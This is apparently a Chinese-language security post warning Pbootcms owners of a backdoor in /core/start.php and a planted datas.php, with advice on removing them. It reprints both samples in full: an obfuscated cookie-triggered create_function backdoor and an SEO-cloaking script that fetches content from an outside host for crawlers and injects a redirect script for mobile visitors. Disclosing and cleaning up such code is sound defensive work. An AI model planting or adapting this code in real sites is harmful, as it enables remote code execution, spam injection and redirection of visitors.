Pbootcms发现网站后门start.php文件

Pbootcms发现网站后门/core/start.php文件，后门代码如下，请将该段代码删除：

<?php
if(isset($_COOKIE['a'])&&isset($_COOKIE['b'])&&isset($_COOKIE['c'])){session_start();if(!isset($_SESSION['views'])){$_SESSION['views']=$_COOKIE['c'];setcookie("c","",time()-3600,"/");}$a=$_SESSION['views'];$b='';$c=[$_COOKIE['a'],$_COOKIE['b']];$a=explode('.',$a);for($d=1;$d<count($a);$d++){$c[0]=$c[0]+$c[1];$e=chr($a[$d]-$c[0]);$b.=$e;}$f=@create_function(base64_decode('JA==').chr(351-236).str_rot13('b').chr(0110461/0525).base64_decode('ZQ=='),chr(0160175/01071).chr(0252430/01344).base64_decode('YQ==').base64_decode('bA==').chr(0x7a08/0x30d).chr(279-243).chr(0x13bcd/0x2bf).chr(0x35e-0x2ef).str_rot13('z').str_rot13('r').chr(0x7ff7/0x31f).base64_decode('Ow=='));}
?>

还有根目录的index.php，另外可能会新增一个datas.php，内容如下：

<?php
set_time_limit(0);error_reporting(0);$a="stristr";$b=$_SERVER;function httpGetlai($c){$d=curl_init();curl_setopt($d,CURLOPT_URL,$c);curl_setopt($d,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');curl_setopt($d,CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt($d,CURLOPT_SSL_VERIFYHOST,FALSE);curl_setopt($d,CURLOPT_RETURNTRANSFER,1);curl_setopt($d,CURLOPT_HEADER,0);$e=curl_exec($d);curl_close($d);return $e;}define('url',$b['REQUEST_URI']);define('ref',!isset($b['HTTP_REFERER'])?'':$b['HTTP_REFERER']);define('ent',$b['HTTP_USER_AGENT']);define('site',"http://qwe.xxseoapi.com/?");define('road',"domain=".$b['HTTP_HOST']."&path=".url."&spider=".urlencode(ent));define('memes',road."&referer=".urlencode(ref));define('regs','@BaiduSpider|Sogou|Yisou|Haosou|360Spider@i');define('mobile','/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/');define('area',$a(url,".xml")or $a(url,".fdc")or $a(url,".one")or $a(url,".bug")or $a(url,".doc")or $a(url,".love")or $a(url,".txt")or $a(url,".ppt")or $a(url,".pptx")or $a(url,".xls")or $a(url,".csv")or $a(url,".shtml")or $a(url,".znb")or $a(url,".msl")or $a(url,".mdb")or $a(url,".hxc"));if(preg_match(regs,ent)){if(area){echo httpGetlai(site.road);exit;}else{echo httpGetlai("http://qwe.xxseoapi.com/x.php");ob_flush();flush();}}if(area&&preg_match(mobile,ent)){echo base64_decode('PHNjcmlwdCBzcmM9aHR0cHM6Ly9qdW1wanMub3NzLWNuLWd1YW5nemhvdS5hbGl5dW5jcy5jb20vanMvaHo1OS5qcz48L3NjcmlwdD4=');exit;}
?>

这段代码是一个恶意代码，它的主要功能是将访问者的信息发送到一个远程服务器，并且如果访问者是搜索引擎爬虫，则会将其重定向到一个特定的网站。此外，它还会检查访问者是否使用移动设备，并在这种情况下将其重定向到另一个网站。建议立即删除此代码。

用Base64 编码/解码工具解码后，内容如下，也就是访问任何页面，手机端打开都会通过这个js跳转：

<script src=https://jumpjs.oss-cn-guangzhou.aliyuncs.com/js/hz59.js></script>

修复的话，需要删除index.php文件里的上述代码，同时删掉datas.php等非程序自带的文件！

备注：因为我是PB站点多，首先也是在PB站点发现的，其他的网站程序也有类似的挂马情况，请根据上述代码自行查看！